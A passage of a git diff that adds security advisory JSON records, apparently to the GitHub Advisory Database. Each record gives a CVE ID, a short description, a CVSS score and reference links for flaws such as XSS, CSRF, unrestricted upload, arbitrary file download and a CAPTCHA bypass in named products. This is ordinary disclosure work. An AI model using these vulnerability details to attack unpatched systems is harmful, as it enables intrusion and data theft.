Galaxy Store prior to version 4.5.63.6 allows local attackers to access sensitive information via implicit intent.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20823" + }, + { + "type": "WEB", + "url": "https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T03:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-gvqv-h7hh-6fcc/GHSA-gvqv-h7hh-6fcc.json b/advisories/unreviewed/2024/02/GHSA-gvqv-h7hh-6fcc/GHSA-gvqv-h7hh-6fcc.json new file mode 100644 index 0000000000000..5775576a79c4d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-gvqv-h7hh-6fcc/GHSA-gvqv-h7hh-6fcc.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gvqv-h7hh-6fcc", + "modified": "2024-02-06T00:30:28Z", + "published": "2024-02-06T00:30:28Z", + "aliases": [ + "CVE-2024-24595" + ], + "details": "Allegro AI’s open-source version of ClearML stores passwords in plaintext within the MongoDB instance, resulting in a compromised server leaking all user emails and passwords.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24595" + }, + { + "type": "WEB", + "url": "https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-522" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-gw24-882g-rww6/GHSA-gw24-882g-rww6.json b/advisories/unreviewed/2024/02/GHSA-gw24-882g-rww6/GHSA-gw24-882g-rww6.json new file mode 100644 index 0000000000000..9f23504338d18 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-gw24-882g-rww6/GHSA-gw24-882g-rww6.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gw24-882g-rww6", + "modified": "2024-02-08T00:32:19Z", + "published": "2024-02-05T18:31:37Z", + "aliases": [ + "CVE-2024-24468" + ], + "details": "Cross Site Request Forgery vulnerability in flusity-CMS v.2.33 allows a remote attacker to execute arbitrary code via the add_customblock.php.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24468" + }, + { + "type": "WEB", + "url": "https://github.com/tang-0717/cms/blob/main/3.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T16:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-gw6h-pq4q-jjr4/GHSA-gw6h-pq4q-jjr4.json b/advisories/unreviewed/2024/02/GHSA-gw6h-pq4q-jjr4/GHSA-gw6h-pq4q-jjr4.json new file mode 100644 index 0000000000000..07895efb15b15 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-gw6h-pq4q-jjr4/GHSA-gw6h-pq4q-jjr4.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gw6h-pq4q-jjr4", + "modified": "2024-02-08T18:30:39Z", + "published": "2024-02-08T18:30:39Z", + "aliases": [ + "CVE-2023-47020" + ], + "details": "Multiple Cross-Site Request Forgery (CSRF) chaining in NCR Terminal Handler v.1.5.1 allows privileges to be escalated by an attacker through a crafted request involving user account creation and adding the user to an administrator group. This is exploited by an undisclosed function in the WSDL that lacks security controls and can accept custom content types.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47020" + }, + { + "type": "WEB", + "url": "https://github.com/Patrick0x41/Security-Advisories/tree/main/CVE-2023-47020" + }, + { + "type": "WEB", + "url": "https://youtu.be/pGB3LKdf64w" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T16:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-gwfv-rx78-gch3/GHSA-gwfv-rx78-gch3.json b/advisories/unreviewed/2024/02/GHSA-gwfv-rx78-gch3/GHSA-gwfv-rx78-gch3.json new file mode 100644 index 0000000000000..201d4a3f5da90 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-gwfv-rx78-gch3/GHSA-gwfv-rx78-gch3.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gwfv-rx78-gch3", + "modified": "2024-02-01T12:30:21Z", + "published": "2024-02-01T12:30:21Z", + "aliases": [ + "CVE-2023-52193" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Live Composer Team Page Builder: Live Composer allows Stored XSS.This issue affects Page Builder: Live Composer: from n/a through 1.5.23.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52193" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/live-composer-page-builder/wordpress-page-builder-live-composer-plugin-1-5-23-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T10:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-gwh8-v9g3-fxxw/GHSA-gwh8-v9g3-fxxw.json b/advisories/unreviewed/2024/02/GHSA-gwh8-v9g3-fxxw/GHSA-gwh8-v9g3-fxxw.json new file mode 100644 index 0000000000000..8a70b2257bacf --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-gwh8-v9g3-fxxw/GHSA-gwh8-v9g3-fxxw.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gwh8-v9g3-fxxw", + "modified": "2024-02-06T06:30:30Z", + "published": "2024-02-06T06:30:30Z", + "aliases": [ + "CVE-2023-33046" + ], + "details": "Memory corruption in Trusted Execution Environment while deinitializing an object used for license validation.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33046" + }, + { + "type": "WEB", + "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T06:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-gwp7-vjfg-ffh8/GHSA-gwp7-vjfg-ffh8.json b/advisories/unreviewed/2024/02/GHSA-gwp7-vjfg-ffh8/GHSA-gwp7-vjfg-ffh8.json new file mode 100644 index 0000000000000..6fd34e583bb52 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-gwp7-vjfg-ffh8/GHSA-gwp7-vjfg-ffh8.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gwp7-vjfg-ffh8", + "modified": "2024-02-05T18:31:37Z", + "published": "2024-02-05T18:31:37Z", + "aliases": [ + "CVE-2023-6028" + ], + "details": "A reflected\ncross-site scripting (XSS) vulnerability exists in the SVG version of System\nDiagnostics Manager of B&R Automation Runtime versions <= G4.93 that\nenables a remote attacker to execute arbitrary JavaScript code in the context\nof the attacked user’s browser session.\n\n\n\n\n\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6028" + }, + { + "type": "WEB", + "url": "https://www.br-automation.com/fileadmin/SA23P018_SDM_Web_interface_vulnerable_to_XSS-1d75bee8.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T18:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-gxmr-rxpv-c8fq/GHSA-gxmr-rxpv-c8fq.json b/advisories/unreviewed/2024/02/GHSA-gxmr-rxpv-c8fq/GHSA-gxmr-rxpv-c8fq.json new file mode 100644 index 0000000000000..0b8258d0104c4 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-gxmr-rxpv-c8fq/GHSA-gxmr-rxpv-c8fq.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gxmr-rxpv-c8fq", + "modified": "2024-02-01T21:30:31Z", + "published": "2024-02-01T21:30:31Z", + "aliases": [ + "CVE-2023-5841" + ], + "details": "Due to a failure in validating the number of scanline samples of a OpenEXR file containing deep scanline data, Academy Software Foundation OpenEX image parsing library version 3.2.1 and prior is susceptible to a heap-based buffer overflow vulnerability.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5841" + }, + { + "type": "WEB", + "url": "https://takeonme.org/cves/CVE-2023-5841.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T19:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-h232-jmfv-j93c/GHSA-h232-jmfv-j93c.json b/advisories/unreviewed/2024/02/GHSA-h232-jmfv-j93c/GHSA-h232-jmfv-j93c.json new file mode 100644 index 0000000000000..f833421c86fcf --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-h232-jmfv-j93c/GHSA-h232-jmfv-j93c.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h232-jmfv-j93c", + "modified": "2024-02-08T12:30:48Z", + "published": "2024-02-08T12:30:48Z", + "aliases": [ + "CVE-2024-24886" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Acowebs Product Labels For Woocommerce (Sale Badges) allows Stored XSS.This issue affects Product Labels For Woocommerce (Sale Badges): from n/a through 1.5.3.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24886" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/aco-product-labels-for-woocommerce/wordpress-product-labels-for-woocommerce-sale-badges-plugin-1-5-3-authenticated-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T11:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-h234-9whq-hx7f/GHSA-h234-9whq-hx7f.json b/advisories/unreviewed/2024/02/GHSA-h234-9whq-hx7f/GHSA-h234-9whq-hx7f.json new file mode 100644 index 0000000000000..bc61dfff986e6 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-h234-9whq-hx7f/GHSA-h234-9whq-hx7f.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h234-9whq-hx7f", + "modified": "2024-02-06T06:30:31Z", + "published": "2024-02-06T06:30:31Z", + "aliases": [ + "CVE-2023-33064" + ], + "details": "Transient DOS in Audio when invoking callback function of ASM driver.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33064" + }, + { + "type": "WEB", + "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T06:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-h24p-75g8-6x6c/GHSA-h24p-75g8-6x6c.json b/advisories/unreviewed/2024/02/GHSA-h24p-75g8-6x6c/GHSA-h24p-75g8-6x6c.json new file mode 100644 index 0000000000000..08749d92e27b3 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-h24p-75g8-6x6c/GHSA-h24p-75g8-6x6c.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h24p-75g8-6x6c", + "modified": "2024-02-07T00:30:25Z", + "published": "2024-02-07T00:30:25Z", + "aliases": [ + "CVE-2024-1263" + ], + "details": "A vulnerability, which was classified as critical, was found in Juanpao JPShop up to 1.5.02. Affected is the function actionUpdate of the file /api/controllers/merchant/shop/PosterController.php of the component API. The manipulation of the argument pic_url leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-253002 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1263" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/Lkrp36sa1EHO" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.253002" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.253002" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T23:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-h2f9-j85c-642x/GHSA-h2f9-j85c-642x.json b/advisories/unreviewed/2024/02/GHSA-h2f9-j85c-642x/GHSA-h2f9-j85c-642x.json new file mode 100644 index 0000000000000..84617d3eff7bd --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-h2f9-j85c-642x/GHSA-h2f9-j85c-642x.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h2f9-j85c-642x", + "modified": "2024-02-08T03:32:45Z", + "published": "2024-02-08T03:32:45Z", + "aliases": [ + "CVE-2024-24024" + ], + "details": "An arbitrary File download vulnerability exists in Novel-Plus v4.3.0-RC1 and prior at com.java2nb.common.controller.FileController: fileDownload(). An attacker can pass in specially crafted filePath and fieName parameters to perform arbitrary File download.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24024" + }, + { + "type": "WEB", + "url": "https://github.com/201206030/novel-plus" + }, + { + "type": "WEB", + "url": "https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24024.txt" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T01:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-h2p5-5xgm-h7m9/GHSA-h2p5-5xgm-h7m9.json b/advisories/unreviewed/2024/02/GHSA-h2p5-5xgm-h7m9/GHSA-h2p5-5xgm-h7m9.json new file mode 100644 index 0000000000000..c702ccf5eeb8e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-h2p5-5xgm-h7m9/GHSA-h2p5-5xgm-h7m9.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h2p5-5xgm-h7m9", + "modified": "2024-02-06T00:30:26Z", + "published": "2024-02-06T00:30:26Z", + "aliases": [ + "CVE-2023-6963" + ], + "details": "The Getwid – Gutenberg Blocks plugin for WordPress is vulnerable to CAPTCHA Bypass in versions up to, and including, 2.0.4. This makes it possible for unauthenticated attackers to bypass the Captcha Verification of the Contact Form block by omitting 'g-recaptcha-response' from the 'data' array.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6963" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3022982" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d317f2c7-06f3-4875-9f9b-eb7f450aa2f4?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-h3x8-mmg8-v2pg/GHSA-h3x8-mmg8-v2pg.json b/advisories/unreviewed/2024/02/GHSA-h3x8-mmg8-v2pg/GHSA-h3x8-mmg8-v2pg.json new file mode 100644 index 0000000000000..e62bbd81bfa5e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-h3x8-mmg8-v2pg/GHSA-h3x8-mmg8-v2pg.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h3x8-mmg8-v2pg", + "modified": "2024-02-06T21:30:26Z", + "published": "2024-02-06T21:30:26Z", + "aliases": [ + "CVE-2024-1255" + ], + "details": "A vulnerability has been found in sepidz SepidzDigitalMenu up to 7.1.0728.1 and classified as problematic. This vulnerability affects unknown code of the file /Waiters. The manipulation leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252994 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1255" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252994" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252994" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T19:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-h66j-qwj8-p6m9/GHSA-h66j-qwj8-p6m9.json b/advisories/unreviewed/2024/02/GHSA-h66j-qwj8-p6m9/GHSA-h66j-qwj8-p6m9.json new file mode 100644 index 0000000000000..f96fd04acc97d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-h66j-qwj8-p6m9/GHSA-h66j-qwj8-p6m9.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h66j-qwj8-p6m9", + "modified": "2024-02-02T15:30:28Z", + "published": "2024-02-02T15:30:28Z", + "aliases": [ + "CVE-2023-47142" + ], + "details": "IBM Tivoli Application Dependency Discovery Manager 7.3.0.0 through 7.3.0.10 could allow an attacker on the organization's local network to escalate their privileges due to unauthorized API access. IBM X-Force ID: 270267.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47142" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/270267" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7105139" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T14:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-h6hc-84g9-qq4q/GHSA-h6hc-84g9-qq4q.json b/advisories/unreviewed/2024/02/GHSA-h6hc-84g9-qq4q/GHSA-h6hc-84g9-qq4q.json new file mode 100644 index 0000000000000..2201288f34dbc --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-h6hc-84g9-qq4q/GHSA-h6hc-84g9-qq4q.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h6hc-84g9-qq4q", + "modified": "2024-02-01T15:30:24Z", + "published": "2024-02-01T15:30:24Z", + "aliases": [ + "CVE-2023-6078" + ], + "details": "An OS Command Injection vulnerability exists in BIOVIA Materials Studio products from Release BIOVIA 2021 through Release BIOVIA 2023. Upload of a specially crafted perl script can lead to arbitrary command execution.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6078" + }, + { + "type": "WEB", + "url": "https://www.3ds.com/vulnerability/advisories" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T14:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-h73w-5jgh-qcmw/GHSA-h73w-5jgh-qcmw.json b/advisories/unreviewed/2024/02/GHSA-h73w-5jgh-qcmw/GHSA-h73w-5jgh-qcmw.json new file mode 100644 index 0000000000000..0ac96cdb7200d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-h73w-5jgh-qcmw/GHSA-h73w-5jgh-qcmw.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h73w-5jgh-qcmw", + "modified": "2024-02-07T03:30:33Z", + "published": "2024-02-07T03:30:33Z", + "aliases": [ + "CVE-2024-1268" + ], + "details": "A vulnerability, which was classified as critical, was found in CodeAstro Restaurant POS System 1.0. This affects an unknown part of the file update_product.php. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-253011.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1268" + }, + { + "type": "WEB", + "url": "https://drive.google.com/drive/folders/1utXNnlH67FjUaBsYhw1cQWyZsO9MLy1i?usp=sharing" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.253011" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.253011" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T02:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-h7cg-cp8w-6f8h/GHSA-h7cg-cp8w-6f8h.json b/advisories/unreviewed/2024/02/GHSA-h7cg-cp8w-6f8h/GHSA-h7cg-cp8w-6f8h.json new file mode 100644 index 0000000000000..fdd6d5a4e3d35 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-h7cg-cp8w-6f8h/GHSA-h7cg-cp8w-6f8h.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h7cg-cp8w-6f8h", + "modified": "2024-02-02T18:30:30Z", + "published": "2024-02-02T00:31:27Z", + "aliases": [ + "CVE-2024-23032" + ], + "details": "Cross Site Scripting vulnerability in num parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23032" + }, + { + "type": "WEB", + "url": "https://github.com/weng-xianhu/eyoucms/issues/57" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T23:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-h8jm-hh42-2j69/GHSA-h8jm-hh42-2j69.json b/advisories/unreviewed/2024/02/GHSA-h8jm-hh42-2j69/GHSA-h8jm-hh42-2j69.json new file mode 100644 index 0000000000000..ca916416456a7 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-h8jm-hh42-2j69/GHSA-h8jm-hh42-2j69.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h8jm-hh42-2j69", + "modified": "2024-02-08T00:32:18Z", + "published": "2024-02-05T18:31:37Z", + "aliases": [ + "CVE-2024-24260" + ], + "details": "media-server v1.0.0 was discovered to contain a Use-After-Free (UAF) vulnerability via the sip_subscribe_remove function at /uac/sip-uac-subscribe.c.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24260" + }, + { + "type": "WEB", + "url": "https://github.com/yinluming13579/media-server_defects/blob/main/media-server_1.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T18:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-h8pv-m5jr-4f99/GHSA-h8pv-m5jr-4f99.json b/advisories/unreviewed/2024/02/GHSA-h8pv-m5jr-4f99/GHSA-h8pv-m5jr-4f99.json new file mode 100644 index 0000000000000..0df0bc0d9e865 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-h8pv-m5jr-4f99/GHSA-h8pv-m5jr-4f99.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h8pv-m5jr-4f99", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0823" + ], + "details": "The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Link To' url in carousels in all versions up to, and including, 2.6.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0823" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3026499/exclusive-addons-for-elementor/trunk/elements/logo-carousel/logo-carousel.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2c5cdc3f-eaa6-4d0b-9e75-5483c723e15a?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-h9g9-92v6-jw8x/GHSA-h9g9-92v6-jw8x.json b/advisories/unreviewed/2024/02/GHSA-h9g9-92v6-jw8x/GHSA-h9g9-92v6-jw8x.json new file mode 100644 index 0000000000000..647e9e5696312 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-h9g9-92v6-jw8x/GHSA-h9g9-92v6-jw8x.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h9g9-92v6-jw8x", + "modified": "2024-02-02T00:31:27Z", + "published": "2024-02-02T00:31:27Z", + "aliases": [ + "CVE-2023-47867" + ], + "details": "\n\n\n\n\n\n\n\n\nMachineSense FeverWarn devices are configured as Wi-Fi hosts in a way that attackers within range could connect to the device's web services and compromise the 